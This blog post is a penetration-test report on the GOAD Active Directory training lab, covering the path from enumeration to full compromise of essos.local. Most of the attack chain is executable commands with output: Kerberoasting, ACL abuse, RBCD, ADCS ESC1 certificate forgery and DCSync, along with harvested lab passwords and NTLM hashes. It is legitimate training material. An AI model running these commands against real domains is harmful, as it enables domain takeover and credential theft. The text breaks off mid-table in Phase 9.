GOAD: Report

Posted Feb 12, 2025

By enonethreezed

25 min read

GOAD: Report

GOAD (Game of Active Directory)

GOAD is an automated Active Directory lab developed by Orange Cyberdefense.
It allows the deployment of realistic multi-domain AD environments with controllers, workstations, and servers using Ansible, Docker, or Ludus, designed for practicing offensive and defensive techniques in corporate Windows infrastructures.

This lab is created and maintained mainly by its creator Cyril Servières (a.k.a @m4yfly).

Repository: github.com/Orange-Cyberdefense/GOAD
Official documentation: orange-cyberdefense.github.io/GOAD

I lost all screenshots because I’m bit clumsy sometimes…

This is the “OSCP report” made with a colleague some weeks later.

Phase 1 — Host Discovery

1.1 ICMP Sweep

Command:

  
for i in $(seq 1 254); do ping -c 1 -W 1 10.5.10.$i &>/dev/null && echo "10.5.10.$i - UP"; done

Reasoning: Lightest and most universal starting point. No credentials or prior knowledge needed. Gives us a map of what is alive before sending noisier traffic.

Active hosts (9 of 254):

IP	Status
10.5.10.10	UP
10.5.10.11	UP
10.5.10.12	UP
10.5.10.21	UP
10.5.10.22	UP
10.5.10.23	UP
10.5.10.50	UP
10.5.10.51	UP
10.5.10.254	UP

Observation: Ranges suggest logical grouping: .10-.12 (group 1), .21-.23 (group 2), .50-.51 (group 3), .254 likely gateway.

Phase 2 — System Identification

2.1 NetExec SMB — Windows system and domain identification

Command:

nxc smb 10.5.10.10 10.5.10.11 10.5.10.12 10.5.10.21 10.5.10.22 10.5.10.23 10.5.10.50 10.5.10.51 10.5.10.254

Reasoning: SMB is the most revealing protocol in Windows networks: hostname, domain, OS version, SMB signing and protocol version — all in a single packet. If the host does not respond to SMB, we rule out Windows and look for Linux.

Results:

IP	Hostname	Domain	OS	SMB Signing	SMBv1
10.5.10.10	KINGSLANDING	sevenkingdoms.local	Win Server 2019	Required	No
10.5.10.11	WINTERFELL	north.sevenkingdoms.local	Win Server 2019	Required	No
10.5.10.12	MEEREEN	essos.local	Win Server 2016	Required	Yes ⚠️
10.5.10.21	THE-EYRIE	sevenkingdoms.local	Win Server 2019	Required	No
10.5.10.22	CASTELBLACK	north.sevenkingdoms.local	Win Server 2019	Disabled ⚠️	No
10.5.10.23	BRAAVOS	essos.local	Win Server 2019	Disabled	No
10.5.10.50	—	—	—	—	—
10.5.10.51	—	—	—	—	—
10.5.10.254	—	—	—	—	—

Critical observations:

Multi-domain Active Directory architecture with 3 forests/domains
MEEREEN has SMBv1 enabled → potential EternalBlue vector (MS17-010)
CASTELBLACK and BRAAVOS have SMB signing disabled → susceptible to relay attacks (NTLM Relay / SMB Relay)

2.2 Nmap — Full service and OS detection

Command:

  
nmap -sV -sC -O -T4 --open -oA nmap_initial \
  10.5.10.{10,11,12,21,22,23,50,51,254}

Reasoning: -sV (versions) and -sC (default NSE scripts) offer the best information-to-noise ratio for a first pass. -O adds OS detection. -T4 is viable in a low-latency local lab. Output saved in all formats (-oA) for further processing.

Full results per host:

10.5.10.10 — KINGSLANDING (DC sevenkingdoms.local)

OS: Windows Server 2019
Role: Domain Controller (Kerberos, LDAP, DNS, Global Catalog)
Open ports: 53, 80, 88, 135, 139, 389, 445, 464, 593, 636, 3268, 3269, 3389, 5985, 5986
Relevant services:
- HTTP/IIS 10.0 (port 80)
- Kerberos (88)
- LDAP / LDAPS (389, 636)
- Global Catalog (3268, 3269)
- RDP (3389)
- WinRM HTTP/HTTPS (5985, 5986)
SMB Signing: Required

10.5.10.11 — WINTERFELL (DC north.sevenkingdoms.local)

OS: Windows Server 2019
Role: Domain Controller
Open ports: 88, 135, 139, 389, 445, 464, 636, 3268, 3269, 3389, 5985, 5986
SMB Signing: Required
NetBIOS Domain: NORTH

10.5.10.12 — MEEREEN (DC essos.local)

OS: Windows Server 2016
Role: Domain Controller
Open ports: 88, 135, 139, 389, 445, 464, 636, 3268, 3269, 3389, 5985, 5986
SMB Signing: Required
SMBv1: Enabled
NetBIOS Domain: ESSOS

10.5.10.21 — THE-EYRIE (Member of sevenkingdoms.local)

OS: Windows Server 2019
Role: Member server — Exchange / OWA
Open ports: 80, 443, 3389, 5985
Relevant services:
- HTTP/IIS 10.0 (80) → redirects to HTTPS
- HTTPS (443) → Outlook Web App (OWA) — Exchange 2019 version 15.2.858
- RDP (3389)
- WinRM (5985)
SMB Signing: Required

10.5.10.22 — CASTELBLACK (Member of north.sevenkingdoms.local)

OS: Windows Server 2019
Role: Member server — Web + MSSQL
Open ports: 80, 1433, 3389, 5985
Relevant services:
- HTTP/IIS 10.0 → File upload application at /Default.aspx
- MSSQL Server 2019 (15.00.2000)
- RDP (3389)
- WinRM (5985)
SMB Signing: Disabled → NTLM Relay possible

10.5.10.23 — BRAAVOS (Member of essos.local)

OS: Windows Server 2019
Role: Member server — Web + MSSQL + ADCS
Open ports: 80, 1433, 3389, 5985
Relevant services:
- HTTP/IIS 10.0 (80) → default IIS page
- MSSQL Server 2019
- Active Directory Certificate Services (ADCS) → CertEnroll share
- RDP (3389)
- WinRM (5985)
SMB Signing: Disabled

10.5.10.50 — ELK (OUT OF SCOPE)

OS: Linux 5.4-5.10 (Ubuntu 22.04)
Services: Elasticsearch 7.17.29 (9200, 9300), Kibana (5601), SSH (22)
Banner: GOAD0deaa6-elk

10.5.10.51 — Wazuh (OUT OF SCOPE)

OS: Linux 5.4-5.10 (Ubuntu 22.04)
Services: Wazuh Dashboard HTTPS (443), Wazuh Manager (1514, 55000), SSH (22)
Banner: GOAD0deaa6-WAZUH

10.5.10.254 — Gateway

OS: Linux 5.4-5.10
Role: Lab network router/gateway

Phase 3 — Service and Access Enumeration

3.1 SMB — Anonymous and guest sessions

Command:

  
nxc smb <targets> -u '' -p '' --shares
nxc smb <targets> -u 'guest' -p '' --shares

Reasoning: Null sessions and the guest account are the first line of unauthenticated enumeration. In modern AD environments they are almost always blocked, but member servers sometimes have more permissive configurations — especially in lab or file-sharing setups.

Results:

Host	Null Session	Guest	Accessible shares
KINGSLANDING	Connection OK, listing denied	Disabled	—
WINTERFELL	Connection OK, listing denied	Disabled	—
MEEREEN	Connection OK, listing denied	Disabled	—
THE-EYRIE	Denied	Disabled	—
CASTELBLACK	Denied	Enabled ✓	`all` (R/W), `public` (R), `IPC$`
BRAAVOS	Denied	Enabled ✓	`all` (R/W), `public` (R), `CertEnroll`, `IPC$`

Files found:

CASTELBLACK\all\arya.txt (413 bytes) — downloaded

Content of arya.txt:

Subject: Quick Departure

Hey Arya,

I hope this message finds you well. Something urgent has come up, and I have to leave for a while.
I left a little surprise for you in your room – the sword you've named "Needle."

Best,
John

Users inferred from file: arya (Stark) and john/jon (Snow)

3.2 SMB — RID Brute (local account enumeration)

Command:

  
nxc smb 10.5.10.22 10.5.10.23 -u 'guest' -p '' --rid-brute

Reasoning: RID brute iterates local SIDs to discover accounts. Works when a guest session is active and the system allows the LsaOpenPolicy/LsaLookupSids call.

Local accounts found (CASTELBLACK and BRAAVOS — identical):

Administrator (RID 500)
Guest (RID 501)
DefaultAccount (RID 503)
WDAGUtilityAccount (RID 504)
localuser (RID 1000)
SQLServer2005SQLBrowserUser$<HOSTNAME> (RID 1001) — SQL Browser service

3.3 Web — HTTP/HTTPS application enumeration

Reasoning: Nmap detected IIS on multiple hosts. In AD environments, web apps often integrate with AD (NTLM/Kerberos authentication), making them interesting attack vectors. Misconfigured or unauthenticated apps may also be present.

Host	URL	Application	Notes
KINGSLANDING	http://10.5.10.10/	IIS default	Default page only
THE-EYRIE	https://10.5.10.21/owa/	OWA — Exchange 2019 (15.2.858)	Outlook Web App login
CASTELBLACK	http://10.5.0.22/Default.aspx	File Uploader (ASP.NET)	No authentication
BRAAVOS	http://10.5.10.23/	IIS default	Default page only

CRITICAL — CASTELBLACK file uploader:

URL: http://10.5.10.22/Default.aspx
No authentication of any kind
multipart/form-data form with FileUpload1
Declared destination: upload/ folder
Server runs IIS under a domain service account
Potential vector: ASPX webshell upload → remote code execution

3.4 LDAP — Directory enumeration

Command:

  
nxc ldap 10.5.10.{10,11,12} -u '' -p ''

Reasoning: LDAP is the AD database. An anonymous query can reveal users, groups, policies and configurations. On most modern DCs, anonymous bind is permitted but anonymous search is not.

Result: All three DCs accept anonymous bind but require authentication for queries. Without credentials, directory cannot be queried.

3.5 MSSQL — SQL instance enumeration

Command:

  
nxc mssql 10.5.10.{22,23} -u '' -p ''
nxc mssql 10.5.10.{22,23} -u 'guest' -p ''

CASTELBLACK: MSSQL Server 2019 (15.00.2000) — anonymous and guest logins rejected BRAAVOS: MSSQL Server 2019 — same result (nxc error on BRAAVOS due to nxc bug)

3.6 Kerberos — User enumeration and AS-REP Roasting

Command:

  
impacket-GetNPUsers <domain>/ -usersfile /tmp/users_got.txt -no-pass -dc-ip <DC>

Reasoning: Impacket’s GetNPUsers does two things simultaneously:

Enumerates valid users: the KDC responds differently for existing users (KDC_ERR_PREAUTH_REQUIRED) vs non-existing ones (KDC_ERR_C_PRINCIPAL_UNKNOWN)
Detects AS-REP Roasting: if any user has UF_DONT_REQUIRE_PREAUTH, the hash is returned directly without a password

Candidate list: 62 GoT-themed names + generic accounts

Confirmed users per domain:

sevenkingdoms.local (DC: KINGSLANDING)

| User | AS-REP Roastable | |——|—————–| | administrator | No | | cersei.lannister | No | | tywin.lannister | No | | jaime.lannister | No | | joffrey.baratheon | No | | stannis.baratheon | No |

north.sevenkingdoms.local (DC: WINTERFELL)

| User | AS-REP Roastable | |——|—————–| | administrator | No | | arya.stark | No | | jon.snow | No | | sansa.stark | No | | robb.stark | No | | catelyn.stark | No | | samwell.tarly | No | | hodor | No | | sql_svc | No |

essos.local (DC: MEEREEN)

| User | AS-REP Roastable | |——|—————–| | administrator | No | | daenerys.targaryen | No | | khal.drogo | No | | jorah.mormont | No | | sql_svc | No |

Observation: No user has AS-REP roasting enabled. The guest account on both KINGSLANDING and WINTERFELL returns KDC_ERR_CLIENT_REVOKED (disabled account), confirming what was seen in SMB.

Enumeration Summary

Identified architecture

                    sevenkingdoms.local
                    ┌─────────────────┐
                    │  KINGSLANDING   │  10.5.10.10  DC
                    │  (Windows 2019) │
                    └────────┬────────┘
                             │ trust?
              ┌──────────────┴──────────────┐
              │                             │
   north.sevenkingdoms.local           essos.local
   ┌──────────────────┐            ┌──────────────────┐
   │   WINTERFELL     │ 10.5.10.11 │    MEEREEN       │ 10.5.10.12
   │   (Win 2019) DC  │            │  (Win 2016) DC   │
   └──────────────────┘            └──────────────────┘
   ┌──────────────────┐            ┌──────────────────┐
   │   CASTELBLACK    │ 10.5.10.22 │    BRAAVOS       │ 10.5.10.23
   │   (Win 2019)     │            │  (Win 2019)      │
   └──────────────────┘            └──────────────────┘
              │                             │
   ┌──────────────────┐
   │   THE-EYRIE      │ 10.5.10.21 (sevenkingdoms.local)
   │   Exchange 2019  │
   └──────────────────┘

Identified attack vectors (pending execution)

#	Vector	Host	Estimated severity	Condition
V1	Unauthenticated file upload → ASPX webshell	CASTELBLACK (10.5.10.22)	Critical	No credentials required
V2	SMB Relay (NTLM Relay)	CASTELBLACK, BRAAVOS	High	Requires NTLM event
V3	SMBv1 / EternalBlue (MS17-010)	MEEREEN (10.5.10.12)	Critical	Verify patch — DoS risk, approval required
V4	ADCS — ESC attacks	BRAAVOS (10.5.10.23)	High/Critical	Requires credentials
V5	OWA — Password spray / ProxyLogon	THE-EYRIE (10.5.10.21)	High	No credentials required
V6	MSSQL — credential brute / xp_cmdshell	CASTELBLACK, BRAAVOS	High	Requires credentials
V7	Kerberoasting	All domains	Medium	Requires credentials

Confirmed domain users (25 total)

sevenkingdoms.local: administrator, cersei.lannister, tywin.lannister, jaime.lannister, joffrey.baratheon, stannis.baratheon

north.sevenkingdoms.local: administrator, arya.stark, jon.snow, sansa.stark, robb.stark, catelyn.stark, samwell.tarly, hodor, sql_svc

essos.local: administrator, daenerys.targaryen, khal.drogo, jorah.mormont, sql_svc

Confirmed local accounts: localuser (on CASTELBLACK and BRAAVOS)

Scope — Pending confirmation

Host	Role	In scope
10.5.10.10 KINGSLANDING	DC sevenkingdoms.local	Pending
10.5.10.11 WINTERFELL	DC north.sevenkingdoms.local	Pending
10.5.10.12 MEEREEN	DC essos.local	Pending
10.5.10.21 THE-EYRIE	Exchange 2019	Pending
10.5.10.22 CASTELBLACK	Web + MSSQL	Pending
10.5.10.23 BRAAVOS	Web + MSSQL + ADCS	Pending
10.5.10.50 ELK	SIEM	Out of scope
10.5.10.51 Wazuh	SIEM	Out of scope
10.5.10.254	Gateway	Pending

Technical References

Phase 4 — Authenticated Enumeration (arya.stark:Needle)

4.1 LDAP Users — north.sevenkingdoms.local (WINTERFELL)

Command:

  
nxc ldap 10.5.10.11 -u arya.stark -p Needle --users

Critical finding — password in description field:

samwell.tarly → description: Samwell Tarly (Password : Heartsbane)

Full user list north.sevenkingdoms.local (16): Administrator, Guest, localuser, krbtgt, arya.stark, eddard.stark, catelyn.stark, robb.stark, sansa.stark, brandon.stark, rickon.stark, hodor, jon.snow, samwell.tarly, jeor.mormont, sql_svc

Relevant groups (NORTH):

Stark (9 members)
Night Watch (3 members)
Mormont (1 member)
AcrossTheSea (0 members)
Domain Admins (2 members)

4.2 LDAP Users — sevenkingdoms.local (KINGSLANDING, via trust)

Users (38 total, including Exchange accounts): Administrator, Guest, localuser, krbtgt, tywin.lannister, jaime.lannister, cersei.lannister, tyron.lannister, robert.baratheon, joffrey.baratheon, renly.baratheon, stannis.baratheon, petyer.baelish, lord.varys, maester.pycelle, lysa.arryn, robin.arryn + SM_* and HealthMailbox* accounts (Exchange)

4.3 LDAP Users — essos.local (MEEREEN, via trust)

Users (12): Administrator, Guest, DefaultAccount, localuser, krbtgt, daenerys.targaryen, viserys.targaryen, khal.drogo, jorah.mormont, missandei, drogon, sql_svc

4.4 Kerberoasting — north.sevenkingdoms.local

Command:

  
nxc ldap 10.5.10.11 -u arya.stark -p Needle --kerberoasting

SPNs found (3 Kerberoastable accounts):

User	Groups	Result
jon.snow	Night Watch, Stark	Hash cracked: `iknownothing`
sansa.stark	Stark	Hash not cracked
sql_svc	—	Hash not cracked

Cracking with hashcat (GoT wordlist + rockyou):

jon.snow → iknownothing ✓ (iconic Jon Snow phrase)
sansa.stark → pending
sql_svc → pending

4.5 NETLOGON — Scripts with credentials

Files found in NETLOGON/SYSVOL on WINTERFELL:

script.ps1 (165B)
secret.ps1 (869B)

script.ps1 — cleartext credentials:

$user = "NORTH\jeor.mormont"
$password = "_L0ngCl@w_"

Comment in file: # passwords in sysvol still ...

secret.ps1 — AES-encrypted secret, decrypted:

The file contained a SecureString encrypted with AES-256-CBC and an embedded key:

Key: 32 hardcoded bytes in the script
IV: extracted from the payload
Decrypted plaintext: powerkingftw135
Signed: T.L. → Tywin Lannister (sevenkingdoms.local)

Accumulated Valid Credentials

User	Password	Domain	Source	Shell access
arya.stark	Needle	north.sevenkingdoms.local	SMB share (arya.txt)	—
samwell.tarly	Heartsbane	north.sevenkingdoms.local	LDAP description field	—
jon.snow	iknownothing	north.sevenkingdoms.local	Kerberoasting	—
jeor.mormont	L0ngCl@w	north.sevenkingdoms.local	NETLOGON script.ps1	WinRM CASTELBLACK (Pwn3d!)
tywin.lannister	powerkingftw135	sevenkingdoms.local	NETLOGON secret.ps1 (AES decrypt)	SMB THE-EYRIE

Confirmed Shell Access

Host	Method	User	Status
CASTELBLACK (10.5.10.22)	WinRM (5985)	jeor.mormont	Interactive shell available

Phase 5 — ACL Exploitation (Attack Path A)

5.1 ForceChangePassword: tywin.lannister → jaime.lannister

Reasoning: BloodHound confirmed that tywin.lannister has ForceChangePassword over jaime.lannister. This right allows changing a user’s password without knowing the current one, via the samr.hChangePasswordUser RPC call. No target credentials required.

Command:

  
net rpc password jaime.lannister 'Kingslayer1!' \
  -U 'sevenkingdoms.local/tywin.lannister%powerkingftw135' -S 10.5.10.10

Result: jaime.lannister:Kingslayer1! ✓

5.2 Targeted Kerberoasting: jaime.lannister → joffrey.baratheon

Reasoning: jaime.lannister has GenericWrite over joffrey.baratheon. With GenericWrite, the servicePrincipalName attribute can be written on the target account even if it has no prior SPN. By assigning a fake SPN, the KDC issues a TGS encrypted with joffrey’s NT hash, which can be cracked offline. This is “Targeted Kerberoasting” — no interaction with the target is required.

Tool: targetedKerberoast.py (ShutdownRepo)

  
python3 targetedKerberoast.py -d sevenkingdoms.local \
  -u jaime.lannister -p 'Kingslayer1!' --dc-ip 10.5.10.10 -o hash.txt

Hash cracked with rockyou: joffrey.baratheon:1killerlion ✓

5.3 WriteDacl abuse: joffrey.baratheon → tyron.lannister

Reasoning: joffrey.baratheon has WriteDacl over tyron.lannister. WriteDacl allows modifying the DACL of the target object, which is equivalent to granting yourself any right over it. dacledit.py from Impacket is used to write a FullControl ACE, then the password of tyron is changed.

Commands:

  
# 1. Write FullControl ACE
impacket-dacledit -action write -rights FullControl \
  -principal joffrey.baratheon \
  -target-dn "CN=tyron.lannister,OU=Westerlands,DC=sevenkingdoms,DC=local" \
  'sevenkingdoms.local/joffrey.baratheon:1killerlion' -dc-ip 10.5.10.10

# 2. Change password
net rpc password tyron.lannister 'Halfman1!' \
  -U 'sevenkingdoms.local/joffrey.baratheon%1killerlion' -S 10.5.10.10

Result: tyron.lannister:Halfman1! ✓

5.4 ACL abuse chain summary

tywin.lannister (had credentials)
  --[ForceChangePassword]--> jaime.lannister     (pass: Kingslayer1!)
  --[GenericWrite / TargetedKerberoast]--> joffrey.baratheon  (pass: 1killerlion)
  --[WriteDacl → FullControl]--> tyron.lannister (pass: Halfman1!)

Next impact: tyron.lannister is a member of DRAGONSFRIENDS@essos.local (ForeignSecurityPrincipal), a group with GenericWrite over the BRAAVOS.essos.local computer → cross-domain RBCD vector.

Phase 6 — Cross-Domain RBCD + BRAAVOS Compromise

6.1 RBCD Attack (Resource-Based Constrained Delegation)

Reasoning: tyron.lannister (sevenkingdoms.local) is a ForeignSecurityPrincipal member of DRAGONSFRIENDS@essos.local. That group has GenericWrite over the BRAAVOS$ computer object. GenericWrite allows writing the msDS-AllowedToActOnBehalfOfOtherIdentity attribute, which is the basis of RBCD: it specifies which accounts can use S4U2Proxy to impersonate any user against that computer.

Steps executed:

  
# 1. Create fake computer account (MachineAccountQuota=10)
impacket-addcomputer -computer-name 'FAKEMACHINE$' -computer-pass 'FakeMachine123!' \
  -dc-ip 10.5.10.12 'north.sevenkingdoms.local/arya.stark:Needle'

# 2. Write msDS-AllowedToActOnBehalfOfOtherIdentity on BRAAVOS$
impacket-rbcd -delegate-from 'FAKEMACHINE$' -delegate-to 'BRAAVOS$' \
  -action write -dc-ip 10.5.10.12 \
  'sevenkingdoms.local/tyron.lannister:Halfman1!'

# 3. S4U2Self + S4U2Proxy → ticket as Administrator@essos.local against BRAAVOS
impacket-getST -spn 'cifs/braavos.essos.local' -impersonate Administrator \
  -dc-ip 10.5.10.12 'essos.local/FAKEMACHINE$:FakeMachine123!'

# 4. Use the Kerberos ticket
export KRB5CCNAME=Administrator@cifs_braavos.essos.local@ESSOS.LOCAL.ccache
impacket-secretsdump -k -no-pass -dc-ip 10.5.10.12 braavos.essos.local

Result: Full secrets dump from BRAAVOS as Administrator.

6.2 Credentials obtained from BRAAVOS

Type	Account	Value
SAM local	Administrator	NTLM: `244483aca7de8a1800539b76e5e42f22`
SAM local	localuser	`password` (DefaultPassword in LSA)
LSA Secret `_SC_MSSQL$SQLEXPRESS`	essos\sql_svc	`YouWillNotKerboroast1ngMeeeeee`
Domain cache	ESSOS\Administrator	DCC2 hash
Domain cache	ESSOS\sql_svc	DCC2 hash

Critical finding: The MSSQL service password is stored in cleartext in LSA Secrets (_SC_<service>). This is normal Windows behavior for services configured with a domain account.

6.3 Confirmed shell access on BRAAVOS

Method	User	Status
SMB PTH	BRAAVOS\Administrator (local)	Pwn3d!
WinRM PTH	BRAAVOS\Administrator (local)	Pwn3d!
MSSQL xp_cmdshell	essos\sql_svc	`Pwn3d!` → `whoami` = `essos\sql_svc`

6.4 Lateral movement — sql_svc valid on CASTELBLACK

sql_svc:YouWillNotKerboroast1ngMeeeeee is also valid on CASTELBLACK (north.sevenkingdoms.local) → Pwn3d! on MSSQL.

Accumulated Valid Credentials (updated)

User	Password / NT Hash	Domain	Source	Shell access
arya.stark	Needle	NORTH	SMB share (arya.txt)	—
samwell.tarly	Heartsbane	NORTH	LDAP description	—
jon.snow	iknownothing	NORTH	Kerberoasting	—
jeor.mormont	L0ngCl@w	NORTH	NETLOGON script.ps1	WinRM CASTELBLACK
tywin.lannister	powerkingftw135	SEVEN	NETLOGON secret.ps1 (AES)	SMB THE-EYRIE
jaime.lannister	Kingslayer1!	SEVEN	ForceChangePassword (tywin)	—
joffrey.baratheon	1killerlion	SEVEN	Targeted Kerberoast (jaime)	—
tyron.lannister	Halfman1!	SEVEN	WriteDacl (joffrey)	—
BRAAVOS\Administrator	NTLM:`244483aca7de8a1800539b76e5e42f22`	LOCAL	RBCD + secretsdump	PTH → BRAAVOS
sql_svc	YouWillNotKerboroast1ngMeeeeee	ESSOS/NORTH	LSA Secret BRAAVOS	MSSQL BRAAVOS+CASTELBLACK
localuser	password	LOCAL	LSA DefaultPassword	—

Phase 7 — ADCS ESC1 → Domain Admin essos.local

7.1 ADCS enumeration with certipy

Command:

  
certipy-ad find -u 'sql_svc@essos.local' -p 'YouWillNotKerboroast1ngMeeeeee' \
  -dc-ip 10.5.10.12 -stdout -vulnerable

CA identified: ESSOS-CA on braavos.essos.local

Vulnerabilities found:

Level	Type	Description
CA	ESC6	`EDITF_ATTRIBUTESUBJECTALTNAME2` enabled — any template allows custom SAN
CA	ESC8	Web Enrollment over HTTP enabled
CA	ESC11	No encryption on RPC/ICPR requests
Template ESC1	ESC1	Enrollee supplies subject + Client Auth EKU + no manager approval
Template ESC2	ESC2	Any Purpose EKU
Template ESC3-CRA	ESC3	Certificate Request Agent EKU
Template ESC9	ESC9	NoSecurityExtension flag
Template WebServer	ESC15	Schema v1 + Enrollee supplies subject (CVE-2024-49019)

All Domain Users can enroll in ESC1/ESC2/ESC3/ESC9 templates.

7.2 ESC1 exploitation — Certificate request as Administrator

Reasoning: ESC1 is the most direct vulnerability: the template allows the requester to freely specify the Subject Alternative Name (SAN/UPN), and the certificate has Client Authentication EKU. This means any authenticated user can request a certificate that identifies itself as any other domain user — including Administrator. The CA signs it without verifying the real identity.

  
# 1. Request certificate with UPN = Administrator@essos.local
certipy-ad req \
  -u 'sql_svc@essos.local' -p 'YouWillNotKerboroast1ngMeeeeee' \
  -dc-ip 10.5.10.12 -target 'braavos.essos.local' \
  -ca 'ESSOS-CA' -template 'ESC1' \
  -upn 'Administrator@essos.local' -out admin_essos

# 2. PKINIT: use the certificate to obtain TGT + NTLM hash
certipy-ad auth -pfx admin_essos.pfx -dc-ip 10.5.10.12 -domain essos.local

Result:

TGT obtained for Administrator@essos.local
NTLM Hash: 54296a48cd30259cc88095373cec24da

7.3 DCSync — Full essos.local dump

Command:

  
impacket-secretsdump -hashes aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da \
  -just-dc-ntlm 'essos.local/Administrator@10.5.10.12'

Hashes obtained (essos.local):

User	NTLM Hash
Administrator	`54296a48cd30259cc88095373cec24da`
krbtgt	`2efe5e7df093392a3cda08b0fab451e2`
daenerys.targaryen (DA)	`34534854d33b398b66684072224bb47a`
viserys.targaryen	`d96a55df6bef5e0b4d6d956088036097`
khal.drogo	`739120ebc4dd940310bc4bb5c9d37021`
jorah.mormont	`4d737ec9ecf0b9955a161773cfed9611`
missandei	`1b4fd18edf477048c7a7c32fda251cec`
drogon	`195e021e4c0ae619f612fb16c5706bb6`
sql_svc	`84a5092f53390ea48d660be52b93b804`

essos.local — DOMAIN COMPROMISED ✓

7.4 Full attack chain toward essos.local DA

arya.stark:Needle (SMB share)
  → Authenticated LDAP → samwell.tarly:Heartsbane (description field)
  → Kerberoasting → jon.snow:iknownothing
  → NETLOGON → jeor.mormont:_L0ngCl@w_ (script.ps1)
  → NETLOGON → tywin.lannister:powerkingftw135 (secret.ps1 AES decrypt)
  → ForceChangePassword → jaime.lannister:Kingslayer1!
  → GenericWrite/Targeted Kerberoast → joffrey.baratheon:1killerlion
  → WriteDacl → tyron.lannister:Halfman1!
  → DRAGONSFRIENDS/GenericWrite → RBCD on BRAAVOS
  → S4U2Proxy as Administrator → secretsdump BRAAVOS
  → LSA Secret → sql_svc:YouWillNotKerboroast1ngMeeeeee
  → ADCS ESC1 → cert as Administrator@essos.local
  → PKINIT → NTLM hash Administrator
  → DCSync MEEREEN → all essos.local hashes

Phase 8 — BloodHound Enumeration (Full AD Graph)

8.1 BloodHound data collection

Reasoning: BloodHound collects relationships between AD objects (users, groups, computers, ACLs, delegations, sessions) and represents them as a directed graph. It identifies non-obvious attack paths through multiple hops that would be impossible to detect manually. bloodhound-python (ingestor for BloodHound Legacy 4.x) performs collection via LDAP and SMB directly from the attacker machine.

Two collections were performed:

Initial collection (2026-03-06): with arya.stark (NORTH), tywin.lannister (SEVEN), sql_svc (ESSOS)
Full collection (2026-03-07): with stronger credentials and LoggedOn to capture active sessions

Commands:

  
# NORTH — DC: winterfell.north.sevenkingdoms.local
bloodhound-python \
  -u 'arya.stark' -p 'Needle' \
  -d north.sevenkingdoms.local \
  -dc winterfell.north.sevenkingdoms.local \
  -ns 10.5.10.11 \
  --auth-method ntlm --dns-tcp \
  -c All,LoggedOn --zip --dns-timeout 30
# Output: bloodhound/north/20260307092022_bloodhound.zip

# SEVENKINGDOMS — DC: kingslanding.sevenkingdoms.local
bloodhound-python \
  -u 'tywin.lannister' -p 'powerkingftw135' \
  -d sevenkingdoms.local \
  -dc kingslanding.sevenkingdoms.local \
  -ns 10.5.10.10 \
  --auth-method ntlm --dns-tcp \
  -c All,LoggedOn --zip --dns-timeout 30
# Output: bloodhound/seven/20260307092024_bloodhound.zip

# ESSOS — DC: meereen.essos.local (with Administrator hash)
bloodhound-python \
  -u 'Administrator@essos.local' \
  --hashes 'aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da' \
  -d essos.local \
  -dc meereen.essos.local \
  -ns 10.5.10.12 \
  --auth-method ntlm --dns-tcp \
  -c All,LoggedOn --zip --dns-timeout 30
# Output: bloodhound/essos/20260307092053_bloodhound.zip

Technical note: Initial runs failed with dns.resolver.LifetimeTimeout because bloodhound-python performs an SRV query _ldap._tcp.dc._msdcs.<domain> before authenticating, and the DCs responded with timeout over UDP (fragmented or filtered response). Fix: --dns-tcp forces DNS queries over TCP, avoiding the UDP fragmentation issue.

Objects collected per domain:

Domain	Users	Groups	Computers	GPOs	Containers	Trusts
north.sevenkingdoms.local	17	51	2	3	19	1
sevenkingdoms.local	39	80	2	2	20	2
essos.local	14	60	3	3	22	1

Active sessions detected (LoggedOn):

Host	Logged-on user SID	Domain
CASTELBLACK (10.5.10.22)	S-1-5-21-2438291940-3241590632-3318250954-1000	LOCAL (localuser)
CASTELBLACK (10.5.10.22)	S-1-5-21-538662962-1941845892-1248869276-1121	NORTH
WINTERFELL (10.5.10.11)	S-1-5-21-538662962-1941845892-1248869276-1000	NORTH (localuser)
THE-EYRIE (10.5.10.21)	S-1-5-21-1250230970-3196869652-16397850-1000	SEVEN
KINGSLANDING (10.5.10.10)	S-1-5-21-317062497-992263240-1765608987-1000	SEVEN
BRAAVOS (10.5.10.23)	S-1-5-21-1670807799-439666968-3082400961-1119	ESSOS
MEEREEN (10.5.10.12)	S-1-5-21-1670807799-439666968-3082400961-1000	ESSOS

8.2 Key findings from the BloodHound graph

8.2.1 ACLs on protected groups (blocked by SDProp)

Groups STARK, NIGHT WATCH and MORMONT appear in BloodHound with GenericAll over Domain Admins@NORTH, Account Operators@NORTH and Enterprise Admins@SEVEN. However, these ACEs do not exist in the real DACL because SDProp (Security Descriptor Propagation) resets them every 60 minutes. BloodHound data was collected before SDProp ran.

Impact: The shortest attack paths to DA shown by BloodHound are false — they do not exist in AD at exploitation time. Blocked.

8.2.2 brandon.stark — Kerberos pre-authentication disabled (AS-REP Roastable)

Authenticated LDAP enumeration revealed that brandon.stark has the UF_DONT_REQUIRE_PREAUTH flag set, so the KDC returns an AS-REP encrypted with his hash without requiring a password.

  
nxc ldap 10.5.10.11 -u 'arya.stark' -p 'Needle' -d north.sevenkingdoms.local --asreproast /tmp/asrep_north.txt

AS-REP hash captured. Cracking attempt with rockyou: not cracked (0.34% traversed — stopped). brandon.stark has no known special privileges in AD (no privileged group, no outbound ACEs).

8.2.3 Constrained delegation: CASTELBLACK$ → HTTP/winterfell

Critical finding: The CASTELBLACK$ object has msDS-AllowedToDelegateTo configured with:

HTTP/winterfell
HTTP/winterfell.north.sevenkingdoms.local

This means CASTELBLACK$ can use S4U2Proxy to obtain HTTP service tickets on behalf of any user toward WINTERFELL. The SPN HTTP/winterfell.north.sevenkingdoms.local matches exactly what WinRM (port 5985) uses, which would allow obtaining a WinRM session as Administrator@north.sevenkingdoms.local on WINTERFELL.

CASTELBLACK$ UAC: 4096 (WORKSTATION_TRUST_ACCOUNT) — no TrustedToAuthForDelegation (0x1000000).

8.2.4 Unconstrained delegation: WINTERFELL$

WINTERFELL$ (DC) is the only host with unconstrained delegation — normal behavior for all DCs. No member computers have unconstrained delegation, so the classic “Printer Bug + Unconstrained Delegation” vector is not applicable without first compromising the DC.

Phase 9 — Attempted Domain Admin NORTH via Constrained Delegation

9.1 Obtaining the CASTELBLACK$ hash

Reasoning: To exploit the constrained delegation of CASTELBLACK$, we need its Kerberos credentials. Since jeor.mormont has local admin on CASTELBLACK (WinRM Pwn3d!), we dump the LSA secrets containing the machine account hash, stored encrypted in the registry under HKLM\SECURITY\Policy\Secrets.

  
nxc smb 10.5.10.22 -u 'jeor.mormont' -p '_L0ngCl@w_' -d north.sevenkingdoms.local --lsa

Result:

LSA Secret	Value
